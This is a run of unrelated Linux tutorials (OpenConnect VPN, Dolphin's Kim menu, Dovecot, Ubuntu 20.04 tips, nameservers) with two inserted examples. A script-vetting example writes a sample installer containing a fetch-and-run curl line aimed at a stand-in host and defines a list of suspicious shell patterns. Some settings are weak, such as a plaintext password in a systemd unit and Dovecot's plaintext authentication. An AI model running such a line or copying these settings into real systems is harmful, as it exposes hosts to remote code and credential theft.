DEFAULT_FORWARD_POLICY="ACCEPT"

Save and close the file. Next, find the name of your server’s main network interface.

ip addr

As you can see, it’s named ens3 on my Ubuntu server.


To configure IP masquerading, we have to add iptables command in a UFW configuration file.

sudo nano /etc/ufw/before.rules

By default, there are some rules for the filter table. Add the following lines at the end of this file. Replace ens3 with your own network interface name.

# NAT table rules
*nat
:POSTROUTING ACCEPT [0:0]
-A POSTROUTING -o ens3 -j MASQUERADE

# End each table with the 'COMMIT' line or these rules won't be processed
COMMIT

In Nano text editor, you can go to the end of the file by pressing Ctrl+W, then pressing Ctrl+V.

The above lines will append (-A) a rule to the end of the POSTROUTING chain of the nat table. It will link your virtual private network with the Internet and also hide your network from the outside world, so the Internet can only see your VPN server’s IP, but can’t see your VPN client’s IP, just like your home router hides your private home network.

Save and close the file. Then enable UFW.

sudo ufw enable

If you have enabled UFW before, then you can use systemctl to restart UFW.

sudo systemctl restart ufw

Now if you list the rules in the POSTROUTING chain of the NAT table by using the following command:

sudo iptables -t nat -L POSTROUTING

You can see the Masquerade rule.


Step 8: Open Port 443 in Firewall

Run the following command to open TCP and UDP port 443. If you configured a different port for ocserv, then change 443 to your configured port.

sudo ufw allow 443/tcp
sudo ufw allow 443/udp

Now OpenConnect VPN server is ready to accept client connections.

For those of you who run a local DNS resolver, if you specified 10.10.10.1 as the DNS server for VPN clients, then you must allow VPN clients to connect to port 53 with the following UFW rule.

sudo ufw insert 1 allow in from 10.10.10.0/24

You also need to edit the BIND DNS server’s configuration to allow VPN clients to send recursive DNS queries like below.

allow-recursion { 127.0.0.1; 10.10.10.0/24; };

How to Install and Use OpenConnect VPN client on Ubuntu 20.04 Desktop

Run the following command to install OpenConnect VPN command line client on Ubuntu desktop.

sudo apt install openconnect

You can connect to the VPN from the command line like below. The -b flag makes it run in the background after the connection is established.

sudo openconnect -b vpn.example.com:port-number

You will be asked to enter VPN username and password. If connection is successfully established, you will see the following message.

Got CONNECT response: HTTP/1.1 200 CONNECTED
CSTP connected. DPD 90, Keepalive 32400
Connected tun0 as 192.168.1.139, using SSL
Established DTLS connection (using GnuTLS). Ciphersuite (DTLS1.2)-(RSA)-(AES-256-GCM).

To stop the connection, run:

sudo pkill openconnect

To run the client non-interactively, use the following syntax.

echo -n password | sudo openconnect -b vpn.example.com -u username --passwd-on-stdin

If you want to use Network Manager to manage VPN connection, then you also need to install these packages.

sudo apt install network-manager-openconnect network-manager-openconnect-gnome

If you are successfully connected to the VPN server, but your public IP address doesn’t change, that’s because IP forwarding or IP masquerading is not working. I once had a typo in my iptables command, which caused my computer to be unable to browse the Internet.

Auto-Connect on System Startup

To let OpenConnect VPN client automatically connect to the server at boot time, we can create a systemd service unit.

sudo nano /etc/systemd/system/openconnect.service

Put the following lines into the file. Replace password, vpn.example.com and username with your own values.

[Unit]
Description=OpenConnect VPN Client
After=network-online.target
Wants=network-online.target

[Service]
Type=simple
ExecStart=/bin/bash -c '/bin/echo -n password | /usr/sbin/openconnect vpn.example.com -u username --passwd-on-stdin'
KillSignal=SIGINT
Restart=always
RestartSec=2

[Install]
WantedBy=multi-user.target

Save and close the file. Then enable this service so that it will start at boot time.

sudo systemctl enable openconnect.service

Explanation of the file content:

  • After=network-online.target and Wants=network-online.target make this service run after network is up.
  • In reality, this service can still run before network is up. We add Restart=always and RestartSec=2 to restart this service after 2 seconds if this service fails.
  • Systemd doesn’t recognise pipe redirection, so in the ExecStart directive, we wrap the command in single quotes and run it with the Bash shell.
  • Since OpenConnect VPN client will run as a systemd service, which runs in the background, there’s no need to add the -b flag to the openconnect command.
  • The KillSignal directive tells Systemd to send the SIGINT signal when the systemctl stop openconnect command is issued. This will perform a clean shutdown by logging the session off, and restoring DNS server settings and the Linux kernel routing table.

To start this Systemd service immediately, run

sudo systemctl start openconnect

To stop this Systemd service, run

sudo systemctl stop openconnect

OpenConnect GUI Client for Windows and MacOS

They can be downloaded from OpenConnect GUI Github Page.

Speed

OpenConnect VPN is pretty fast. I can use it to watch 4k videos on YouTube.


Auto-Renew Let’s Encrypt Certificate

Edit root user’s crontab file.

sudo crontab -e

Add the following line at the end of the file. It’s necessary to reload ocserv service for the VPN server to pick up new certificate and key file.

@daily certbot renew --quiet && systemctl reload ocserv

Optimization

OpenConnect by default uses TLS over UDP protocol (DTLS) to achieve faster speed, but UDP can’t provide reliable transmission. TCP is slower than UDP but can provide reliable transmission. One optimization tip I can give you is to disable DTLS, use standard TLS (over TCP), then enable TCP BBR to boost TCP speed.

To disable DTLS, comment out (add # symbol at the beginning) the following line in ocserv configuration file.

udp-port = 443

Save and close the file. Then restart ocserv service.

sudo systemctl restart ocserv.service

To enable TCP BBR, please check out the following tutorial.

In my test, standard TLS with TCP BBR enabled is two times faster than DTLS.

Troubleshooting

Note that if you are using OpenVZ VPS, make sure you enable the TUN virtual networking device in VPS control panel. (If you use Vultr VPS, then you have KVM-based VPS, so you don’t have to worry about this.)

If you encounter any problem, then check OpenConnect VPN server log.

sudo journalctl -eu ocserv.service

I found that if I change port 443 to a different port, the Great Firewall of China will block this VPN connection.

Make OpenConnect VPN server and web server use port 443 at the same time

Normally a port can only be used by one process. However, we can use HAproxy (High Availability Proxy) and SNI (Server Name Indication) to make ocserv and Apache/Nginx use port 443 at the same time.

First, edit ocserv configuration file.

sudo nano /etc/ocserv/ocserv.conf

Uncomment the following line. This will allow ocserv to obtain the client IP address instead of HAproxy IP address.

listen-proxy-proto = true

Then find the following line.

#listen-host = [IP|HOSTNAME]

Change it to

listen-host = 127.0.0.1

This will make ocserv listen on 127.0.0.1 because later HAproxy will need to listen on the public IP address. Save and close the file. Then restart ocserv.

sudo systemctl restart ocserv

Next, we also need to make the web server listen on localhost only, instead of listening on public IP address. If you use Nginx, edit the server block file.

sudo nano /etc/nginx/conf.d/www.example.com.conf

In the SSL server block, find the following directive.

listen 443 ssl;

Change it to

listen 127.0.0.2:443 ssl;

This time we make it listen on 127.0.0.2:443 because 127.0.0.1:443 is already taken by ocserv. Save and close the file. Then restart Nginx.

sudo systemctl restart nginx

Now install HAproxy.

sudo apt install haproxy

Edit configuration file.

sudo nano /etc/haproxy/haproxy.cfg

Copy and paste the following lines to the end of the file. Replace 12.34.56.78 with the public IP address of your server. Replace vpn.example.com with the domain name used by ocserv and www.example.com with the domain name used by your web server.

frontend https
    bind 12.34.56.78:443
    mode tcp
    tcp-request inspect-delay 5s
    tcp-request content accept if { req_ssl_hello_type 1 }

    use_backend ocserv if { req_ssl_sni -i vpn.example.com }
    use_backend nginx if { req_ssl_sni -i www.example.com }
    use_backend nginx if { req_ssl_sni -i example.com }

    default_backend ocserv

backend ocserv
    mode tcp
    option ssl-hello-chk
    server ocserv 127.0.0.1:443 send-proxy-v2

backend nginx
    mode tcp
    option ssl-hello-chk
    server nginx 127.0.0.2:443 check

Save and close the file. Then restart HAproxy.

sudo systemctl restart haproxy

In the configuration above, we utilized the SNI (Server Name Indication) feature in TLS to differentiate VPN traffic and normal HTTPS traffic.

  • When vpn.example.com is in the TLS Client Hello, HAProxy redirects traffic to the ocserv backend.
  • When www.example.com is in the TLS Client Hello, HAProxy redirects traffic to the nginx backend.
  • If the client doesn’t specify the server name in TLS Client Hello, then HAproxy will use the default backend (ocserv).

You can test this setup with the openssl tool. First, run the following command multiple times.

echo | openssl s_client -connect your-server-IP:443 | grep subject

We didn’t specify server name in the above command, so HAproxy will always pass the request to the default backend (ocserv), and its certificate will be sent to the client. Next, run the following two commands.

echo | openssl s_client -servername www.example.com -connect your-server-IP:443 | grep subject

echo | openssl s_client -servername vpn.example.com -connect your-server-IP:443 | grep subject

Now we specified the server name in the commands, so HAproxy will pass request accordingly. Note that the Cisco AnyConnect App doesn’t support TLS SNI, so it’s better to set ocserv as the default backend in HAProxy configuration file.

When renewing Let’s Encrypt certificate for your website, it’s recommended that you use the http-01 challenge instead of tls-alpn-01 challenge, because HAproxy is listening on port 443 of the public IP address, so it can interfere with the renew process.

sudo certbot renew --preferred-challenges http-01

Fixing HAproxy Error

If your Nginx web server doesn’t show up in your browser and you see the following messages in haproxy log (/var/log/haproxy.log)

Server nginx/nginx is DOWN, reason: Socket error, info: “Connection reset by peer

backend nginx has no server available!

Layer6 invalid response

It may be because your backend Nginx web server is using a TLS certificate with the OCSP must-staple extension. Nginx doesn’t send the OCSP staple information on the first HTTP request. To make it work, be sure to add a resolver in your Nginx virtual host configuration like below.

{
….
ssl_trusted_certificate /etc/letsencrypt/live/www.example/chain.pem;
ssl_stapling on;
ssl_stapling_verify on;

resolver 8.8.8.8;
….
}

Save and close the file. Then restart Nginx.

sudo systemctl restart nginx

Also consider removing health check for the backend server in HAproxy. So change

server nginx 127.0.0.2:443 check

To

server nginx 127.0.0.2:443

Save and close the file. Then restart HAproxy.

sudo systemctl restart haproxy

How to Disable TLS 1.0 and TLS 1.1 in ocserv

The PCI council deprecated TLS 1.0 on June 30, 2018 and mainstream web browsers are going to disable TLS 1.0 and TLS 1.1 in 2020. We should do the same with the VPN server. Edit the main configuration file.

sudo nano /etc/ocserv/ocserv.conf

Find the following line:

tls-priorities = "NORMAL:%SERVER_PRECEDENCE:%COMPAT:-RSA:-VERS-SSL3.0:-ARCFOUR-128"

To disable TLS 1.0 and TLS 1.1 in OpenConnect VPN server, just add -VERS-TLS1.0 and -VERS-TLS1.1 in the line.

tls-priorities = "NORMAL:%SERVER_PRECEDENCE:%COMPAT:-RSA:-VERS-SSL3.0:-ARCFOUR-128:-VERS-TLS1.0:-VERS-TLS1.1"

Save and close the file. Then restart ocserv.

sudo systemctl restart ocserv

Now ocserv will only accept TLS 1.2. For further information on configuring the TLS parameter in ocserv, please see GnuTLS priority strings.

To check if TLS 1.0 is supported in your OpenConnect VPN server, run the following command.

openssl s_client -connect vpn.your-domain.com:443 -tls1

And check TLS 1.1

openssl s_client -connect vpn.your-domain.com:443 -tls1_1

If you see the following message in the output, that means the TLS version is not supported.

New, (NONE), Cipher is (NONE)
Secure Renegotiation IS NOT supported

Note: The ocserv package on Ubuntu 20.04 supports TLS 1.3.
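A small auditor for the ocserv.conf settings changed in this tutorial (VPN address range, route lines, tunnel-all-dns and tls-priorities), added here as an example and not part of the original tutorial or of ocserv. Both config fragments are constructed samples, the function names are hypothetical, and the version model assumes NORMAL enables TLS 1.0 through 1.3 before the -VERS-/+VERS- tokens are applied.

```python
import ipaddress

# Constructed sample: the default values this tutorial starts from.
DEFAULT_CONF = """\
ipv4-network = 192.168.1.0
ipv4-netmask = 255.255.255.0
#tunnel-all-dns = true
dns = 8.8.8.8
dns = 1.1.1.1
route = 10.0.0.0/8
route = 172.16.0.0/12
route = 192.168.0.0/16
tls-priorities = "NORMAL:%SERVER_PRECEDENCE:%COMPAT:-RSA:-VERS-SSL3.0:-ARCFOUR-128"
"""

# Constructed sample: the same settings after the edits described in the tutorial.
EDITED_CONF = """\
ipv4-network = 10.10.10.0
ipv4-netmask = 255.255.255.0
tunnel-all-dns = true
dns = 8.8.8.8
dns = 1.1.1.1
#route = 10.0.0.0/8
#route = 172.16.0.0/12
#route = 192.168.0.0/16
tls-priorities = "NORMAL:%SERVER_PRECEDENCE:%COMPAT:-RSA:-VERS-SSL3.0:-ARCFOUR-128:-VERS-TLS1.0:-VERS-TLS1.1"
"""

HOME_LAN = ipaddress.ip_network("192.168.1.0/24")   # range the tutorial says many home routers use
BASE_VERSIONS = {"TLS1.0", "TLS1.1", "TLS1.2", "TLS1.3"}   # assumption: what NORMAL enables


def parse_conf(text):
    """Parse 'key = value' lines; keys such as dns and route may repeat."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue   # blank line, commented-out setting, or not a setting
        key, value = (part.strip() for part in line.split("=", 1))
        conf.setdefault(key, []).append(value.strip('"'))
    return conf


def enabled_tls_versions(priorities):
    """Apply +VERS-/-VERS- tokens left to right (simplified model of a priority string)."""
    enabled = set(BASE_VERSIONS)
    for token in priorities.split(":"):
        sign, name = token[:1], token[1:]
        if sign not in ("+", "-") or not name.startswith("VERS-"):
            continue
        version = name[len("VERS-"):]
        if version in ("ALL", "TLS-ALL"):
            enabled = set(BASE_VERSIONS) if sign == "+" else set()
        elif version in BASE_VERSIONS:
            if sign == "+":
                enabled.add(version)
            else:
                enabled.discard(version)
    return enabled


def audit(conf):
    """Return (code, detail) findings for the main ocserv.conf, not per-user files."""
    findings = []
    if "tls-priorities" in conf:
        legacy = sorted(enabled_tls_versions(conf["tls-priorities"][-1]) & {"TLS1.0", "TLS1.1"})
        if legacy:
            findings.append(("legacy-tls", "still enabled: " + ", ".join(legacy)))
    if "ipv4-network" in conf:
        mask = conf.get("ipv4-netmask", ["255.255.255.0"])[-1]
        vpn_net = ipaddress.ip_network(f"{conf['ipv4-network'][-1]}/{mask}", strict=False)
        if vpn_net.overlaps(HOME_LAN):
            findings.append(("lan-collision", f"{vpn_net} overlaps {HOME_LAN}"))
    if conf.get("route"):
        findings.append(("split-tunnel", "route lines active: " + ", ".join(conf["route"])))
    if conf.get("tunnel-all-dns", ["false"])[-1] != "true":
        findings.append(("dns-outside-tunnel", "tunnel-all-dns is not enabled"))
    return findings


if __name__ == "__main__":
    for label, text in (("default", DEFAULT_CONF), ("edited", EDITED_CONF)):
        print(label, audit(parse_conf(text)) or "no findings")
```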

Per User or Per Group Configuration

Ocserv allows per user and per group configurations. To enable this feature, uncomment the following two lines in /etc/ocserv/ocserv.conf file.

config-per-user = /etc/ocserv/config-per-user/
config-per-group = /etc/ocserv/config-per-group/

Save and close the file. Then create the per-user and per-group config directories.

sudo mkdir /etc/ocserv/config-per-user/
sudo mkdir /etc/ocserv/config-per-group/

Next, you can create a file under these two directories. For example, create the user1 file to allow custom configuration for user1.

sudo nano /etc/ocserv/config-per-user/user1

You can also create the group1 file to allow custom configuration for the group named group1.

sudo nano /etc/ocserv/config-per-group/group1

You can add something like below in the file.

route = 10.10.10.0/255.255.255.0
tunnel-all-dns = false
dns = 8.8.8.8
dns = 1.1.1.1

Where:

  • The first line means that after user1 or users in group1 connect to this VPN server, only traffic to the 10.10.10.0/24 network will be routed via the VPN server. Traffic to other IP addresses is routed via the original gateway.
  • The second line disables tunneling DNS queries.
  • The third and fourth line set DNS servers for VPN clients.

I use this trick to allow another VPS (virtual private server) of mine to connect to this VPN server without disrupting normal traffic, so the TUN device (vpns0) of my VPN server is always turned on, which means my VPN server will always have the private IP address 10.10.10.1.

Save and close the file. Restart ocserv for the changes to take effect.

sudo systemctl restart ocserv

Wrapping Up

That’s it! I hope this tutorial helped you install and configure OpenConnect VPN on Ubuntu 20.04.

How to Edit, Rotate, Convert and Resize Images from Dolphin

Converting and resizing images should not be a complicated process. These are basic functions that should not require more than a right-click. We cannot complain that Windows or any other operating system does not provide this functionality built in. After all, how many people are actually interested in converting or resizing images? But since you are here, you probably are. Today we will see how to convert and resize images from Dolphin with a right-click. Dolphin, for those who don’t know, is the default file manager on the KDE Plasma desktop, which comes pre-installed in Kubuntu.

In the past we have seen how you can resize images with a right-click in Windows and even convert and resize them in Ubuntu in the same way. In Ubuntu, as in many other Linux distributions and desktop environments, Nautilus is the default file manager. However, Nautilus does not fit in well with the Plasma desktop, and you don’t need Nautilus if you already have Dolphin. Dolphin is a much more functional file manager than Nautilus, and we’ve already talked about it. If you want to know more about Dolphin, see:

How to install and use the Dolphin file manager on Ubuntu.

KDE Image Menu

Dolphin is much more customizable than other file managers, not just Nautilus. It also lets you add or remove functions. The right-click context menu options are called services in Dolphin, and you can easily add more. KDE Image Menu, usually called Kim for short, is one of these services. Using Dolphin’s integrated service downloader, you can easily download and install a range of image tools that also work from the right-click menu, but they can only convert PNG to JPG or vice versa and are not as useful as Kim. With Kim you can not only resize images, but also compress them without resizing them. It not only converts images, but also rotates them and turns them into greyscale or sepia. You can create GIFs, retouch photos, create a Flash or HTML gallery and much more, all with a right-click and a few more clicks depending on the task.

How do you set up the KDE Image Menu?

Kim is unfortunately a bit outdated, and you can’t install it by simply pressing the Install button on the Dolphin service installer. Installing Kim is not so complicated if you can copy and paste text into the terminal from here. Before you can do this, you need to download the Kim archive package via the link below.

Right-click on the downloaded package and select Extract > Extract Archive. You will then have a folder called kim4. Open this folder, in Dolphin of course, and press F4. Pressing F4 opens a terminal directly inside Dolphin, in the folder you are in. You can also open a separate terminal window if you wish, but be sure to navigate to the kim4 folder in the terminal. Now copy and paste each of the following commands into the terminal one after the other, pressing Enter after each one.

sudo cp src/kim_*.desktop /usr/share/kservices5/ServiceMenus/
sudo cp src/bin/kim_* /usr/bin/
sudo chmod a+rx /usr/bin/kim_*
sudo chmod a+r /usr/share/kservices5/ServiceMenus/kim_*.desktop
sudo mkdir /usr/share/kim
sudo cp COPYING /usr/share/kim/kim_about.txt
sudo mkdir /usr/share/kim/slideshow/
sudo cp src/slideshow/* /usr/share/kim/slideshow/
sudo mkdir /usr/share/kim/gallery
sudo cp src/gallery/* /usr/share/kim/gallery/

Editing, rotating, converting and resizing images with a right-click using Kim in Dolphin

As soon as you have run the commands, restart Dolphin. Go to an image in Dolphin, right-click on it and hover over Actions. Here you should see three Kim entries: compression and resizing, conversion and rotation, manipulation and publication. If you don’t see Kim in the Actions section, log out of the current session and then log back in, or restart the computer. I recommend a full restart if nothing else works.

How do I install Dovecot on CentOS 8

Dovecot is an open source service for IMAP and POP3 on Unix-like operating systems. It focuses on being a lean and secure email server and is available for most Linux operating systems. This tutorial will help you install and configure POP3/IMAP with Dovecot on your CentOS 8 operating system.

Step 1 – Install Dovecot on CentOS 8

The Dovecot package is available in the AppStream yum repository. Simply install the package on your CentOS 8 system using the yum/dnf package manager.

sudo dnf -y install dovecot

Step 2 – Configure Dovecot

Once the installation is complete, configure the Dovecot server according to your needs. Below you will find a quick and useful configuration of Dovecot to work with your system.

  • Edit the Dovecot main configuration file and uncomment the following lines to enable the POP3 and IMAP protocols. Also configure Dovecot to listen on all interfaces.
    sudo vi /etc/dovecot/dovecot.conf
    protocols = imap pop3 lmtp
    listen = *, ::
  • Then edit the authentication file for Dovecot and update the following values.
    sudo vi /etc/dovecot/conf.d/10-auth.conf
    disable_plaintext_auth = no
    auth_mechanisms = plain login
  • Then edit the mail configuration file to configure the location of your mailbox. Make sure the mail server settings have the correct location for emails.
    sudo vi /etc/dovecot/conf.d/10-mail.conf
    mail_location = maildir:~/Maildir
  • Then edit the following configuration file and specify the user and group name of the mail server.
    sudo vi /etc/dovecot/conf.d/10-master.conf
    unix_listener /var/spool/postfix/private/auth {
      mode = 0666
      user = postfix
      group = postfix
    }
  • Finally, edit the Dovecot SSL configuration file. Set ssl to yes or required. A self-signed certificate is used by default. If you have your own certificates, update them as follows.
    sudo vi /etc/dovecot/conf.d/10-ssl.conf
    ssl = yes

ssl_cert = /letsencrypt/live/mail.tecadmin.net/cert.pem
ssl_key = /letsencrypt/live/mail.tecadmin.net/privkey.pem

Step 3 – Manage the Dovecot Service

We can control Dovecot with the systemctl command line tool. Use the following command to enable the Dovecot service.

sudo systemctl enable dovecot.service

Use the following commands to start, stop or restart the Dovecot service:

sudo systemctl start dovecot.service
sudo systemctl stop dovecot.service
sudo systemctl restart dovecot.service

To view the current status of the service, use the following command:

sudo systemctl status dovecot.service

Step 4 – Test setup

The username rahul was created on my CentOS 8 system. We need the command line program mutt to connect to the mailbox via the imaps protocol.

sudo dnf install mutt

Then use the following command to connect to your mailbox:

mutt -f imaps:// [Email Protection]

You will be asked to accept the certificate (press a to always accept it). You will then be asked to enter your password. Enter the user’s password and press the Enter key. You will see the e-mail address of your account.

Step 5 – Setting up rules in the Firewall

To access your mail server from another computer, you must configure firewall rules to allow connections to the server on the required ports. The default POP3/IMAP ports are:

  • IMAP – 143
  • IMAPS – 993
  • POP3 – 110
  • POP3S – 995

Execute the following commands to add firewall rules:

sudo firewall-cmd --add-service={pop3,imap} --permanent
sudo firewall-cmd --add-service={pop3s,imaps} --permanent

Then reload the firewall to apply the changes.

sudo firewall-cmd --reload

Conclusion

The Dovecot service is now configured on your system. You have configured your server to access the user’s mailbox using the POP3 or IMAP protocols.


10 Things To Do After Installing Ubuntu 20.04 LTS – And 4 Things You Should Not Do!


Here is our selection of the best things you can do after installing Ubuntu 20.04 LTS ‘Focal Fossa’ – things that will help you get the most out of your Linux system.

The release of the latest Long Term Support (LTS) version of Ubuntu is a big event, as most Ubuntu users (whose number is constantly growing) choose to run the LTS edition rather than the latest short-term release.

Ubuntu prides itself on its default setup. It comes with applications that most people will use and with settings that most people will like.

But you’re not everyone, and there may be things you want to turn on and off or install, and that’s exactly what this guide covers.

Although some of the tips below may seem obvious, they are often forgotten or overlooked. Others are niche or serve specific needs. In any case, this set of tweaks improves the Ubuntu experience without compromising its stability and reliability.

Things To Do After Installing Ubuntu 20.04

1. Look what’s new.

Each version of Ubuntu is different from the previous one, and the latest release is no exception. So, before you start changing settings or flipping switches, take a little time – say 3 minutes and 25 seconds – to find out what’s new and remarkable about Focal Fossa.

If you don’t see the embedded video above, you can find it on our YouTube channel.

2. Playing with Dark Mode

Dark modes are all the rage on every major mobile and desktop operating system these days, and that now includes Ubuntu.

Although this is not the default theme, it is very easy to switch to dark window colours in Ubuntu 20.04 :

  • Open Settings > Appearance
  • Select the setting for dark windows.

That’s it! The change takes effect immediately and darkens the background and toolbars of most applications. Note that dark mode in Ubuntu does not change the color of the GNOME Shell user interface, such as the notification menu, calendar, and system menu.

If you get tired of the dark display, you can return to the default mixed mode in the Appearance Settings window (or try the bright light version).

3. Install GNOME Tweaks

GNOME Tweaks is a Swiss army knife of options, including…

  • Change the GTK and icon theme
  • Move the window buttons to the left
  • Change the font and font size on your desktop
  • Automatically centre new windows
  • Show the day of the week in the clock label
  • Switch between dynamic and static workspaces

And a little more!

In short, GNOME Tweaks makes fine-tuning your Ubuntu desktop much, much easier than wandering around in the dconf editor.

The best way to install it is to do it in one click:

Click here to install GNOME Tweaks on Ubuntu.

4. Get a powerful preview tool for files

GNOME Sushi is a useful space-bar preview tool for the GNOME Shell desktop.

Anyone who has ever tried macOS immediately knows what I mean by ‘space-bar preview’, a feature first introduced in Apple’s operating system and very popular with users.

First select (click) the file in the Nautilus file manager and then press the space bar. This gives an almost instant preview of the file.

The layout of the preview varies depending on the file, but the most common file formats are supported. Use Sushi for instant image viewing, media playback, PDF and LibreOffice document scrolling, folder size information, and more, all without having to open a single application.

And if you find a file you want to open fully, the Sushi window (in most cases) allows you to do so.

Sushi is free and open source software. You can install it on Ubuntu from Ubuntu Software. Just search for Sushi by name, or if you are reading this from an Ubuntu system, click this button:

Click here to install GNOME Sushi on Ubuntu

5. Enable minimize on click

If you want applications to be minimized when you click their icon in the Ubuntu Dock, you can enable this behavior manually.

And I do mean manually, because even though it’s one of the most popular Ubuntu tweaks, there’s still no easy way to do it with the GUI. But don’t worry, the command line is close at hand!

Open a new terminal window and run the following command to enable minimize on click in Ubuntu:

gsettings set org.gnome.shell.extensions.dash-to-dock click-action 'minimize'

The change is immediate.

Want to move the Ubuntu Dock? Use Settings > Dock > Position

6. Show battery percentage

Skip this step if you are not using a laptop (or if you are and don’t need to see your battery percentage without opening the status menu).

The Ubuntu battery indicator lets you check battery life at a glance without opening the status menu. But it’s a bit small and a bit vague (does 2 bars mean I still have 60% or 30%?).

You can easily have Ubuntu display the battery percentage using the power panel of the GNOME Tweaks tool, which I recommended in step 3:

  1. Open GNOME Tweaks
  2. Select Top Bar.
  3. Set the battery percentage slider to ON.

If you do not want to follow the GUI route, you can use the following command to display the battery level as a percentage in the top panel:

gsettings set org.gnome.desktop.interface show-battery-percentage true

Much better!

Tip: You can open the terminal window at any time by pressing Ctrl + Alt + t.

7. Change touchpad scroll direction

If you use a touchpad or trackpad with Ubuntu and don’t like the way the scroll direction is set by default, called Natural Scrolling, you don’t have to stick with it!

Simply change the touchpad scroll direction in Ubuntu so that the content moves in the same direction as you move, for example when scrolling down a page:

  • Open Settings
  • Go to Mouse & Touchpad
  • Slide the Natural Scrolling switch to the on position.

That’s all you need to set a scroll direction that makes you feel more comfortable.

8. Set up Livepatch

Livepatch can install and apply kernel security updates without rebooting your computer.

This feature is (of course) more focused on servers and business systems with mission-critical workloads, but Ubuntu Livepatch also works well on desktops, although only on LTS versions!

If you hate restarting as much as I do, this is definitely a good find. Simply launch Livepatch from the applications grid.

9. Turn on automatic trash emptying

The privacy options in the Settings app include a convenient set of space-saving features, including automatic emptying of the trash at regular intervals, which is ideal if you (like me) tend to forget to empty the trash regularly.

This feature and the automatic deletion of temporary files setting can help you save space on Ubuntu with a minimum of effort on your part.

Yes: Ubuntu gives you a reason to be lazy!

10. Try top of the line software

The world of software, free, paid and open source, is at your disposal at Ubuntu. But where to start?

Well, tons of open source favorites are available for installation on Ubuntu 20.04 LTS directly from the Ubuntu Software application, including:

  • Blender
  • Chromium
  • GIMP
  • Krita
  • Kdenlive
  • OBS
  • VirtualBox
  • VLC

And you aren’t limited to what’s in the archives. Other popular (but not necessarily open source) programs are also available for Ubuntu, including well-known names such as:

  • Discord
  • Google Chrome
  • Lightworks
  • Skype
  • Slack
  • Steam
  • Telegram
  • Tracktion Waveform

And that’s just scratching the surface.

You can follow this blog to get more software recommendations, news about updated and promising new applications, how and when we open them! For more information about the software, please refer to the best Electron applications in our manual.

… and 4 things you can’t do

So here are some things to do after the installation of Ubuntu 20.04 LTS. I hope you found some of them useful – but what shouldn’t you do after installing or upgrading Ubuntu 20.04?

Here are some…

Do not add millions of additional PPAs

PPAs are a convenient way to install new applications and updates for Ubuntu that are delivered outside the main repository.

However, take some time to get familiar with your system before you add random PPAs (often recommended by, yes, sites like mine).

And if you can’t live without them, try to use only software-specific PPAs, i.e. don’t add “kitchen sink” PPAs that contain a lot of different tools and software you don’t want!

And that’s twice as much as the sink in the kitchen.

Do not uninstall a default desktop.

As mentioned at the beginning of this note, Ubuntu comes with a number of default settings that are as attractive as possible.

But Ubuntu’s take on the GNOME Shell desktop is not for everyone.

And while it’s trivial to get a vanilla GNOME installation on Ubuntu, completely removing the distribution’s default desktop is not the right solution if you don’t like it.

You will get a cheaper and cleaner system if you first install the right distribution and desktop.

Do not execute random Internet commands

You should never execute scripts or random commands that you find online on your system.

My rule of thumb is this: If I don’t understand what a command is going to do, I won’t run it.

As always.

This goes double for commands that do more than one thing at a time or that download and run scripts (ALWAYS check the content of the scripts before running them. Always, always, always).

P.S. NEVER execute this command. You know what I mean. It’s just… …no.
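
One way to act on the “check the content of the scripts” advice above, as an added example that is not from the original article: save the script to a file, compare its SHA-256 digest with the one the publisher lists, and print the lines that deserve a close read before anything runs. The sample installer, the example.invalid URL, the pattern list and the function names are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: vet a downloaded script instead of piping it straight into a shell.

# Constructs worth reading closely before a script runs. This list is an
# assumption made for the example: a prompt for manual review, not a malware detector.
REVIEW_PATTERNS='curl |wget |sudo |rm -rf|base64 -d|eval |\| *(ba)?sh'

# sha256_of FILE: print the SHA-256 hex digest of FILE.
sha256_of() {
    sha256sum -- "$1" | awk '{print $1}'
}

# flagged_count FILE: print how many lines match REVIEW_PATTERNS.
flagged_count() {
    grep -cE -e "$REVIEW_PATTERNS" -- "$1" || true
}

# review_script FILE EXPECTED_SHA256
#   returns 2: digest differs from the published one (do not run the file)
#   returns 1: digest matches; flagged lines were printed with line numbers
#   returns 0: digest matches and nothing was flagged (still read the script)
review_script() {
    local file="$1" expected="$2" actual
    actual=$(sha256_of "$file")
    if [ "$actual" != "$expected" ]; then
        echo "digest mismatch for $file: got $actual" >&2
        return 2
    fi
    if grep -nE -e "$REVIEW_PATTERNS" -- "$file"; then
        return 1
    fi
    return 0
}

# write_sample_installer PATH: write a constructed installer script to PATH.
write_sample_installer() {
    cat > "$1" <<'EOF'
#!/bin/sh
echo "Installing example-tool"
curl -fsSL https://example.invalid/payload.sh | sh
sudo cp example-tool /usr/local/bin/
echo "done"
EOF
}

# Demo on the constructed sample. Nothing here executes the installer.
workdir=$(mktemp -d)
write_sample_installer "$workdir/install.sh"

# Stand-in for the digest a publisher would list next to the download link.
published=$(sha256_of "$workdir/install.sh")

rc=0
review_script "$workdir/install.sh" "$published" || rc=$?
echo "review result: $rc (lines above need reading)"

# Simulate a download that was altered after the digest was published.
echo 'echo "extra line"' >> "$workdir/install.sh"
rc=0
review_script "$workdir/install.sh" "$published" || rc=$?
echo "review result after modification: $rc"

rm -rf -- "$workdir"
```

The flagged lines show why a “download and run” one-liner deserves the extra care: the sample fetches and executes a second script that would never be seen if the first were piped directly into a shell.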

Don’t forget to share Ubuntu with others

A good way to contribute to the improvement of Ubuntu is to talk about it, what it can do, how you find it useful, and so on.

You can do it online in your blog post or social media updates or in person at a convention or leisure group.

I’m not saying we should go to aunt Barbara in the Netherlands and ask her to install it, but don’t be afraid to articulate the advantages of a system like Ubuntu.

P.S. Maybe not to mention it on the first date… speak from experience.

That’s my point, but what’s yours? Share it below!

How to set the domain name servers

Setting Nameservers for Your Domain

A Bit About the Nameservers

Nameservers (older use “Name Servers”) are part of DNS (Domain Name Server) records. DNS consists of A records, CNAME records, and mail routing records, also called MX records. The nameservers deal with the web requests for your domain. They basically tell your web browser where to go to serve the information to your computer over the internet.

By default, when you type your domain into a browser you will probably see a parking page (arranged by your domain registrar), meaning the registrar uses its own nameservers. You can update the nameservers with the ones provided by your web host.

For now, we will cover registering and getting your domain set up to interact with your web hosting server space. This domain<->website “connection” is done through the nameservers. Every domain has to have nameservers records in order to be accessible on the internet.
The nameservers often come in pairs, and are endorsed by IP addresses. Look at this form sample for demonstration:

  • ns1.bluehost.com, 162.88.60.37
  • ns2.bluehost.com, 162.88.61.37

When changing the nameservers at your domain provider you will usually use only the first “name” part: ns1.bluehost.com and ns2.bluehost.com.

